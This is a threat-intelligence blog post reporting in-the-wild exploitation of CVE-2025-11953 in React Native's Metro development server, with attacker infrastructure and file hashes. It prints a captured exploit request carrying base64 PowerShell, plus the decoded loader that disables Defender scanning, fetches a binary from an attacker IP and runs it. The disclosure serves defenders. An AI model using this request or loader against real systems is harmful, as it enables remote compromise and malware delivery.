Metro4Shell: Exploitation of React Native’s Metro Server in the Wild

VulnCheck observed exploitation of CVE-2025-11953 on December 21, 2025, when our Canary network recorded exploitation of a Metro Development Server. The vulnerability, which we jokingly refer to as Metro4Shell, was automatically added to VulnCheck KEV the same day. Additional exploitation observed in January delivered the same payloads on January 4, 2026 and January 21, 2026, indicating continued operational use.

Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of 0.00405. This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet.

VulnCheck customers had visibility into exploitation of this vulnerability in November through exploits and Suricata rules developed by the VulnCheck Initial Access Intelligence team. That early visibility ultimately informed and powered the detection logic deployed across the VulnCheck Canary network.

Metro is the JavaScript bundler and development server used by React Native applications during development and testing. Under default conditions, Metro can bind to external interfaces and expose an /open-url endpoint. On Windows, the endpoint allows unauthenticated and remote attackers to execute arbitrary OS commands via a simple POST request.

The vulnerability was found by JFrog researchers who published a root cause analysis on their blog. This was followed by multiple proof of concept exploits on GitHub.

The exploitation observed by VulnCheck was neither experimental nor exploratory. The payloads delivered through the Canary network were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.

The attackers employed a multi-stage PowerShell-based loader delivered through cmd.exe. The initial PowerShell is base64 encoded. An example of the observed attack pattern follows:

POST /open-url HTTP/1.1
Host: VC_REDACTED
User-Agent: curl/7.85.0
Content-type: application/json
Content-Length: 4632
Connection: Close

{"url":"cmd /c powershell -EncodedCommand JABjAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgACQAKABHAGUAdAAtAEwAbwBjAGEAdABpAG8AbgApAC4AUABhAHQAaAA7AAoAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAKAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAYwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAcwB5AHMAdABlAG0AVABlAG0AcABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoACgAkAHQAYwBwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdAAoACIAOAAuADIAMQA4AC4ANAAzAC4AMgA0ADgAIgAsADYAMAAxADIANAApADsACgAkAHQAYwBwAFMAdAByAGUAYQBtACAAPQAgACQAdABjAHAAQwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAKACQAcgBlAHEAIAA9ACAAIgBHAEUAVAAgAC8AdwBpAG4AZABvAHcAcwAiADsACgAkAHIAZQBxAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBlAHEAKQA7AAoAJAB0AGMAcABTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcgBlAHEAYgAsADAALAAkAHIAZQBxAGIALgBMAGUAbgBnAHQAaAApADsACgAKACQAZQB4AGUAYwBwACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgAGoAegBEAGoAaQBxAEsAVQAuAGUAeABlADsACgAkAGYAaQBsAGUAUwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGUAeABlAGMAcAApADsACgAKACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAANAAwADkANgA7AAoAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAwADsACgB3AGgAaQBsAGUAIAAoACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHQAYwBwAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApACkAIAAtAGcAdAAgADAAKQAgAHsACgAgACAAIAAgACQAZgBpAGwAZQBTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7AAoAfQAKACQAZgBpAGwAZQBTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKACQAdABjAHAAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAGUAeABlAGMAcAAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACcAMwBxAGgAQQBJAG0AYQBMAGoANwA0AHoASABkAHkAeQBHAEQAUQBGAHMATgBzAGYATABMAHUARgBoAFcATQBoAFgANwBDAHIAcwBiAGwAQgBJADMAbQBYAGoAcgBrAG4ARwA5AHkAOABBAHoAVQBXAHUAOQB3AGUATQA3AHEATgBpADIAWQBzAFgANwBtAG4AcQBMAEoASABKAEcAYQBXAGoANgBzAHMASAA5AHEAawBCAHoAYwBDAHAATgBnAGQATQA3AG0ATABuADIARQBrAFEATAB5AHAAdgA3AHgARwBPAG0AVwBSAGoANgBVAHMARwBOAHEAawBCAHoATQBIAHMATgBzAGYATABMAHUASgBoAFcAOAA2AFEANwBtAG4AcwBiAHgAQwBPAG0AVwBSAGgATABFAHIASAA5AHkANABBAGkAQQBFAHUATgA4AEIASgBiAE8AUwBsAEcARQBuAFgANwBtAG0AcAA3AEoASABKAEcAYQBYAGoASwBzAHMASAA5AHUAawBCAHoASQBZAHUAOQBzAGUATQA3AHEASwBuAEcAMABpAFEATAAyAG0AdgA3AEIARgBPAG0AUwBUAGsAcgBvAHYASAA4AE8AKwBCAFQAbwBBAHYAOQBrAGUAUABiAGkASwBpADIAWQBuAFIAcQBhAHUAcQA3AGwAZgBKAG0AYQBYAGgAcgAwAGwASAB0AHUAcQBBAEQAQQBZAHUAOQBvAGYATQA3AG0ASgBsAG4AawBqAFIAcgBLAHAAcgA3AGwARABKAEgAZQBSAGkANgBVAHYASABOAHEAawBCAHoAUQBHAHAATgB3AGQASgA3ADIATQBsAEcATQBoAFUAYgBtAHUAcgBLAFoAQQBKAEcASwBMAGoAYgBzAG8AQQBkAHkAOQBEAHoAbwBQAHUATgBRAFcAUABiAHEATgBsADMAawBsAFEANwB5AHgAcgBMAHQAZgBMAEcAQwBmAGkAcgBzAHMARwA5AHEAcQBEAGkANABFAHUAOQBVAEIATAA3AGkASQBpADIASQBrAFMANwA2AHYAcgByAHQAQgBOAEcAVwBVAGoAcQBVAGsASABjAE8ANwBCAGoARQBZAHMAdABvAFYASwA3AHUATgBsAFcAOAAwAFEANwBxAHQAcwBiAGwAQQBMAEgAbQBVAGoAYgBrAHoASAB0AHEAeQBEAEQAZwBCAHYATgB3AFAATAA3AG0AUABpADIARQA2AFEANwB5AG0AcwBiAGwARgBKAFcAMgBUAGkAYgBvAG8ARAA5ACsANABCAEMANABPAHMAcwBNAGUASwA3AGkAUwBsAEcANABzAFMANwA2AHYAcgByAHAAQgBOAEcAKwBMAGoAYgA4AHQAQQBkACsANgBCAEMANABBAHYAdABjAFoATABMAG0AUABoAFcATQBqAFgANwBxAHIAcgBhAFoAQQBKAEcAKwBMAGkANwBvAG4ARwBkADIANwBCAGoAYwBXAHYAdABvAEIATAA3ACsAUABpADIAWQBqAFIAcQBhAHUAcgBMAGwATABJAG0AZQBVAGoATAA0ADkASAB0AG0AawBCAHoAQQBGAHAATgB3AFoASwBLAFcATgBsAG0AQQB1AFIAcgBpAHEAcgBhAGgASgBPAG0AVwBVAGkANgBVAHMARgB0AFcAawBCAEQARQBDAHMATgBzAGYATABMAHEATgBoAFcAOAA2AFEANwBtAG4AcwBiAHAARABJAFgAbQBSAGoAcgBFAHIASAA5AHkANgBCAHkAQQBDAHYAYwBNAGQASwBiAG0AUwBrAEcAOAA2AFMAYgB5AGwAcQBiAGgAQQBKAEcANgBGAGkATAB3AHoASABkAG0ANQBHAEQARQBFAHYAYwBNAGUASwBiAHUARwBrADIAYwBsAFIAYgB1AC8AcgByAGgARwBPAG0AYQBTAGkASwBVAG8ASABjAE8ANABBAFQAbwBBAHUAdAB3AGIASwA2AHUATgBsAEcAWQA2AFEATABtAHgAcgByAEIAZgBKAFcAKwBTAGgAcgAwAHQASAB0ADYANQBGAGoAUQBCAHAATgA4AGMASgBhAFcATwBsADIATQA2AFEAcgBtAGwAcQBiAGgAQQBKADIANgBpAEsAMABnAEQAQgBNAHAASABlAG8AdwBKAE8AMABxAGMALwBxAHIAQQAxAGkAYQBSADgAZgB0AHYAVQB4AGMANQBvAHoAMgBHAG4AUQA9AD0AJwA="}

When decoded, the PowerShell payload performs the following actions:

Adds Microsoft Defender exclusion paths for the current working directory and the system temporary directory
Establishes a raw TCP connection to an attacker-controlled host and port
Sends a GET /windows request.
Writes the received data to a file in system’s temporary directory
Executes the downloaded binary with a large argument string.

The decoded payload follows:

$currentDirectory = $(Get-Location).Path;
$systemTempDirectory = [System.IO.Path]::GetTempPath();

Add-MpPreference -ExclusionPath $currentDirectory 2> $null;
Add-MpPreference -ExclusionPath $systemTempDirectory 2> $null;

$tcpClient = New-Object System.Net.Sockets.TcpClient;
$tcpClient.Connect("8.218.43.248",60124);
$tcpStream = $tcpClient.GetStream();
$req = "GET /windows";
$reqb = [System.Text.Encoding]::UTF8.GetBytes($req);
$tcpStream.Write($reqb,0,$reqb.Length);

$execp = Join-Path -Path $systemTempDirectory -ChildPath jzDjiqKU.exe;
$fileStream = [System.IO.File]::OpenWrite($execp);

$buffer = New-Object byte[] 4096;
$bytesRead = 0;
while (($bytesRead = $tcpStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
    $fileStream.Write($buffer, 0, $bytesRead);
}
$fileStream.Close();
$tcpStream.Close();
$tcpClient.Close();
Start-Process -FilePath "$execp" -ArgumentList '3qhAImaLj74zHdyyGDQFsNsfLLuFhWMhX7CrsblBI3mXjrknG9y8AzUWu9weM7qNi2YsX7mnqLJHJGaWj6ssH9qkBzcCpNgdM7mLn2EkQLypv7xGOmWRj6UsGNqkBzMHsNsfLLuJhW86Q7mnsbxCOmWRhLErH9y4AiAEuN8BJbOSlGEnX7mmp7JHJGaXjKssH9ukBzIYu9seM7qKnG0iQL2mv7BFOmSTkrovH8O+BToAv9kePbiKi2YnRqauq7lfJmaXhr0lHtuqADAYu9ofM7mJlnkjRrKpr7lDJHeRi6UvHNqkBzQGpNwdJ72MlGMhUbmurKZAJGKLjbsoAdy9DzoPuNQWPbqNl3klQ7yxrLtfLGCfirssG9qqDi4Eu9UBL7iIi2IkS76vrrtBNGWUjqUkHcO7BjEYstoVK7uNlW80Q7qtsblALHmUjbkzHtqyDDgBvNwPL7mPi2E6Q7ymsblFJW2TibooD9+4BC4OssMeK7iSlG4sS76vrrpBNG+Ljb8tAd+6BC4AvtcZLLmPhWMjX7qrraZAJG+Li7onGd27BjcWvtoBL7+Pi2YjRqaurLlLImeUjL49HtmkBzAFpNwZKKWNlmAuRriqrahJOmWUi6UsFtWkBDECsNsfLLqNhW86Q7mnsbpDIXmRjrErH9y6ByACvcMdKbmSkG86SbylqbhAJG6FiLwzHdm5GDEEvcMeKbuGk2clRbu/rrhGOmaSiKUoHcO4AToAutwbK6uNlGY6QLmxrrBfJW+Shr0tHt65FjQBpN8cJaWOl2M6QrmlqbhAJ26iK0gDBMpHeowJO0qc/qrA1iaR8ftvUxc5oz2GnQ=='

This same methodology was observed across multiple attacks. The deliberate disabling of Microsoft Defender protections before payload retrieval indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow.

The downloaded binary is UPX-packed (SHA-256: d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6), but once unpacked (SHA-256: 7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886), the payload is revealed to be a Rust-based binary that incorporates basic anti-analysis logic, including runtime checks intended to hinder static inspection.

VulnCheck observed attacks originating from 65.109.182.231, 223.6.249.141, and 134.209.69.155, with the “windows” payload hosted at 8.218.43.248:60124 and 47.86.33.195:60130. The same infrastructure also hosted a corresponding binary named “linux”.

The most important aspect of this activity is not the payloads or the infrastructure involved, but the timeline. VulnCheck observed exploitation attempts in December. As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared.

Attackers do not wait for KEV listings, vendor summaries, or consensus narratives. Once proof-of-concept code exists and scanning is viable, exploitation follows quickly. Developer tooling is particularly attractive because it is widespread, inconsistently monitored, and rarely treated as a production-grade attack surface.

CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.

Organizations cannot afford to wait for CISA KEV inclusion, vendor reports, or broad consensus before taking action. Exploitation often begins as soon as exposure exists. Identifying those gaps early is critical to reducing attacker dwell time and preventing opportunistic compromise.

This is exactly the class of activity VulnCheck Canaries are designed to surface, and why VulnCheck KEV tracks real-world exploitation as it happens instead of after narratives solidify. It is a prerequisite for defending modern infrastructure.

Indicator	Observed Role
65.109.182.231	Exploitation source
223.6.249.141	Exploitation source
134.209.69.155	Exploitation source
8.218.43.248	Payload host (Windows)
47.86.33.195	Payload host (Windows and Linux)

SHA-256 Hash	Description
d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6	UPX-packed Windows payload
7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886	Unpacked Windows payload
d1886b189474b02467ed2845df0938cec9785e99c3d4b04e0b7de3cafbee4182	UPX-packed Linux payload
6686d4baa9d483da27ba84dab85e96e42b790b608571de7bcb07a1fd7c975fe3	Unpacked Linux payload

VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. For more research like this check out our blogs, Frost Checks First, The Mystery OAST Host Behind a Regionally Focused Exploit Operation, and XWiki Under Increased Attack.

Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.

Source link

What's Hot

ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611) | Blog

Incident: Life Saving Victoria server hacked by ‘malicious actors’ | ABC News Australia

Incident: Yakult Australia targeted in cyber attack, employee files published on dark web | ABC News Australia

ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611) | Blog

Wildlife Cops Are Searching AI Cameras for ICE

Accelerating Our Footprint and Innovation: Why VulnCheck Posted a Record-Setting Q3 | Blog

Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

Catchy & Intriguing

The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

Most Popular

Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

Catchy & Intriguing

The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

Our Picks

ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611) | Blog

Incident: Life Saving Victoria server hacked by ‘malicious actors’ | ABC News Australia

Incident: Yakult Australia targeted in cyber attack, employee files published on dark web | ABC News Australia

Subscribe to Updates

What's Hot

Metro4Shell: Exploitation of React Native’s Metro Server in the Wild | Blog

Related Posts

Subscribe to Updates